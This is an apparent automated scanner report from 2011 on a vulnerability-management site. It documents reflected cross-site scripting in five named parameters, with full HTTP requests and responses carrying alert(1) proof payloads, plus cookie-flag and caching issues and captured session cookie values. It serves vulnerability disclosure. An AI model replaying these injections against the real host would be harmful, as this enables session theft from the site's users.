CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Apr 26 18:28:26 CDT 2011.



Loading

1. Cross-site scripting (reflected)

1.1. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]

1.2. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]

1.3. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]

1.4. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Alias parameter]

1.5. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Lang parameter]

2. SSL cookie without secure flag set

3. Referer-dependent response

3.1. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

3.2. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

4. Cookie without HttpOnly flag set

5. Cacheable HTTPS response

5.1. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

5.2. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

6. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 466b0<script>alert(1)</script>06150d728a4 was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
Content-Length: 5561

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
TMa%2FJr5D6uvrPpcnlWeaFL5og7AM0BH%2BH4fN8MXm9UXeJn6xaX4%2ByP8BKOI2IQ%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.9348020141478628466b0<script>alert(1)</script>06150d728a4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:51:34 GMT
Content-Length: 5755

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.9348020141478628466b0<script>alert(1)</script>06150d728a4<&>
...[SNIP]...

1.2. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload fdc1c<script>alert(1)</script>2d43224a51b was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
Content-Length: 5561

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgK6xaDLAQLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD1azw9Rle9Oba8vY3Hs81Cmd5T%2B41mxr5Ld0eSlB88xQfdc1c<script>alert(1)</script>2d43224a51b&__VIEWSTATE=1eNrdW01sG8cVFilRliLbdGOLdRGXGruuf2KRXP5TspWYomRLsaQooiQ7MQRlyB1y11rusrNDUuyhSH%2BPBQoUMdpDiwY9tEVR9NJbgRbtKWib%2FhwKtEefemrS9BfoT%2FpmdilyJTkyJQoKQwOa3dl5M2%2Fe970382bX77m8Xs9QIBwPx2Ip%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:50:35 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
   ViewState: /wEWBgK6xaDLAQLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD1azw9Rle9Oba8vY3Hs81Cmd5T+41mxr5Ld0eSlB88xQfdc1c<script>alert(1)</script>2d43224a51b --->
...[SNIP]...

1.3. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ffd1"-alert(1)-"dabd45c1f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FusionVM/DesktopDefault.aspx?3ffd1"-alert(1)-"dabd45c1f1a=1 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:51:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:51:01 GMT
Content-Length: 34857


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx?3ffd1%22-alert(1)-%22dabd45c1f1a=1" id="ctl00">
<div class="aspNetHidden">
<input
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopDefault.aspx?3ffd1"-alert(1)-"dabd45c1f1a=1", "/FusionVM/go/www.fusionvm/0/en-US/username=/Default.aspx");</script>
...[SNIP]...

1.4. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Issue detail

The value of the Alias request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73dfb"-alert(1)-"905ea5234ca was submitted in the Alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb"-alert(1)-"905ea5234ca&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:54:12 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:54:12 GMT
Content-Length: 16872


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb%22-alert(1)-%22905ea5234ca&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;Ite
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm73dfb"-alert(1)-"905ea5234ca&TabId=0&Lang=en-US&OU=0&ItemId=35715", "/FusionVM/go/www.fusionvm/0/en-US/username=/OU0/Default.aspx");</script>
...[SNIP]...

1.5. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Issue detail

The value of the Lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd6ec"-alert(1)-"99c3d54552a was submitted in the Lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-USfd6ec"-alert(1)-"99c3d54552a&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:55:07 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:55:06 GMT
Content-Length: 16872


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-USfd6ec%22-alert(1)-%2299c3d54552a&amp;OU=0&amp;Ite
...[SNIP]...
<script language="javascript">Session_Init("/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-USfd6ec"-alert(1)-"99c3d54552a&OU=0&ItemId=35715", "/FusionVM/go/www.fusionvm/0/en-US/username=/OU0/Default.aspx");</script>
...[SNIP]...

2. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=7c08e1d9-6975-48a3-9c34-081b0ae79e10; expires=Tue, 26-Apr-2011 22:14:02 GMT; path=/
Set-Cookie: ASP.NET_SessionId=vggqtwwd5coqz310h11pdmez; path=/; HttpOnly
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

3. Referer-dependent response  previous  next
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



3.1. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Request 1

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:49:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 34791


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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
...[SNIP]...

Request 2

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:49:30 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:30 GMT
Content-Length: 34743


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="1eNrdW01sG8cVFilRliLbdGObceuUmriuf2KJXP5TtpWYomRLsaQooiQ7MQRlyB1y11rusrOzpNhDkf4eCxQoYrSHFg16aIui6KW3Ai3aU9A2/TkUaI8+9dSk6S/Qn/TN7FLkSnJkShQUhgY0u7PvvXnzvvfezJtdv+fx+31Do5FEJB5Pw7+oP+ANPrlIipSYygLWibZckTEjSsDr9fjlxt+iuOy1L69f6envcfr4n75Wmj4/l3hkRTXVvEYUOdDvPeLnT4JHscWMglGuaIQRX69RLMreoU3Gov+ELAd6ZO9x/wl/oC94JKuQwjqRS8MeRYafGLyv6KgEKgx6ejjdwCRm+Dapm4Ge4NDaMzOMlLOGpTNvLwzNyZ8Ack44NI+ragmmtkw1n6wwVrkaDtdqtRBXyWKE1gyqyfwubIYxZWpBI+GxaCQpSbHwEtnA5lpRBSutsZqxxkhBWSsoKimaa0aV0LU8JbigPM/whqEb5fqMPB5JBfuAjfkuCmYkmBEwI86MbGbEmZHNDHP0+k97TryA1XWrjClaUe/jOtb51GECw/2+j7+v1sNHfMeyrb0gsM9/2jsYD0eT4agUifzCs6QQZKuTY2AKxOkZNTSN0IugTLGoFghSHG1lpDITKQTL/BFS9aJBy5ipho5MUrCoyuoI1LOf6UbVfsR7+Ax1QzNKdVQE4UZN1UvwAMiwDBNmRGcIvAwjjeB1xBTMENmoGCYMmTMKKtZQrjGAbpXzhJr2QEwBa1XgNhQKyV6fY5a3PPdxFZsFqlbY1SoYrjYOA8pGLWRUiH7pXPimZYJmK3PhSWKuM6MyZ8iWRsxwY5B5UnPfrKikFsJmZeP5jKZic5wbvCiEVMsXlnAe4JUuzGK9NE700eXchReX4Z673szkeCSdSqTHzo2cOzeCztVUmSnjCUkaUYhaUpi4BE3BKHlMzfE6MUfALdRPEwzRwm/PXb4mPF7ElOO7MMeVFugBX4pDOmEhLR+uVcIZ21nNxvSce2cC9g0olkhF41LswrWsgnWIc+6iSfCZ+HIOWbQEpmcGqlADsGMIF5haVU2GTBW8pEiNMsoqgB74BgQlNR1fPQpeVCyiO2A3Qpt++tQjlIXRejM3F3bwywzScK2MQTQCF5ozdBnXG1qByy7rMIBs+6zJ9VR1kFslOnEpjSpGxdLAAdzq4yIQgy+jGji2Am2+bs9mNI+5yzlzQrhSwRRcU4OhKyYBgUImYapwbBgJsiSIA4uC6IyK7hC1RtQQ4hYtkZBBSx9wvxyL7t8vvS6/fNPjYE1NM1QkRDYrBmVYExmpEI7HouFiOBGT0lIU0moknpTHkoVYWAtLs1LOlcOsdWleyuowSynbSC9SNhZNJWNSJiFlDYrBj6UpUKsC/mFKU8yQpmzspKkSNayKNAVZQpqqYFZQCBBw88MY0lTV0nRCcV7VhFBpEnKTdBNUDpvMoHUpElJYGbxz4kUxCGqMwTG3R0BiAJGFHPHoBZDOp4lc0p3IODYFORU8mZhmuTU0go9K4dY6vwcdTswTWCToOrrDu9Fy7hFpHGxEwTWrxK3hum7UIAmb6